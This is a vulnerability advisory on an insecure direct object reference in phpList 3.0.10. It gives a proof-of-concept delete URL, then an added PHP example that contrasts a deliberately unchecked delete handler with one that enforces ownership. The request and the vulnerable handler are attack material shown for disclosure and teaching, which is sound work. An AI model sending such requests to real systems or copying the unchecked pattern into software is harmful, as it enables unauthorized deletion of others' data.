phpList version 3.0.10 suffers from an insecure direct object reference vulnerability.
# Affected software: phplist
# Type of vulnerability: insecure object reference
# URL: phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: phpList ltd. - v3.0.10
# Proof of concept
Insecure object reference on page deletion.
Vulnerable parameter: delete
Example:
http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
Reference:
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29
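
The server-side check that closes this class of bug, as an added example that is not phpList's code and is not part of the original advisory. It assumes the usual insecure direct object reference pattern, where the id in `delete` is acted on without confirming that the requesting admin owns the object; the store layout, session keys and function names are hypothetical.

```php
<?php
// Added example: hypothetical names throughout, not phpList's code or schema.
declare(strict_types=1);

// Constructed sample data: object id => id of the admin who owns it.
$objects = [1 => 10, 2 => 20, 3 => 10];

/**
 * Vulnerable pattern: a valid request token shows the request came from
 * this session's UI, but says nothing about who owns object $rawId.
 */
function deleteUnchecked(array &$store, array $session, string $tk, $rawId): bool
{
    if (!hash_equals($session['tk'], $tk)) {
        return false;
    }
    unset($store[(int) $rawId]);   // acts on whatever id the client sent
    return true;
}

/** Hardened pattern: token check, strict id parsing, then ownership check. */
function deleteOwned(array &$store, array $session, string $tk, $rawId): bool
{
    if (!hash_equals($session['tk'], $tk)) {
        return false;
    }
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || !isset($store[$id])) {
        return false;              // malformed or unknown reference
    }
    if ($store[$id] !== $session['admin_id']) {
        // Log the refusal so repeated cross-owner attempts are visible.
        error_log(sprintf('denied delete id=%d admin=%d', $id, $session['admin_id']));
        return false;              // object belongs to another admin
    }
    unset($store[$id]);
    return true;
}

// Constructed session: admin 10 holds a valid token for its own session.
$session = ['admin_id' => 10, 'tk' => 'constructed-token'];

$a = $objects;   // admin 10 asks to delete object 2, which admin 20 owns
var_dump(deleteUnchecked($a, $session, 'constructed-token', '2'), isset($a[2]));
$b = $objects;   // same request against the hardened handler, then an owned object
var_dump(deleteOwned($b, $session, 'constructed-token', '2'), isset($b[2]));
var_dump(deleteOwned($b, $session, 'constructed-token', '1'), isset($b[1]));
```

The `tk` value in the example URL is handled here as a per-session request token; checking it is kept in both handlers to show that it does not substitute for the ownership check.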